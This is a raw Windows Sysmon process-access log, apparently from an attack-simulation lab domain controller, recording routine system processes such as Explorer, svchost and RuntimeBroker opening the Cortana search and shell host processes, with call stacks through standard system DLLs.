14:58:36.622{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000080265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.622{A7A01FEF-C0A6-607E-8105-00000000BB01}8363768C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.622{A7A01FEF-C0A6-607E-8105-00000000BB01}8363768C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.607{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.607{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.607{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.607{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.591{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000080255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-C0A6-607E-7705-00000000BB01}4348736C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000080254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000080252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-B636-607E-2700-00000000BB01}27241412C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000080250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.575{A7A01FEF-B636-607E-2700-00000000BB01}27241412C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000080249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 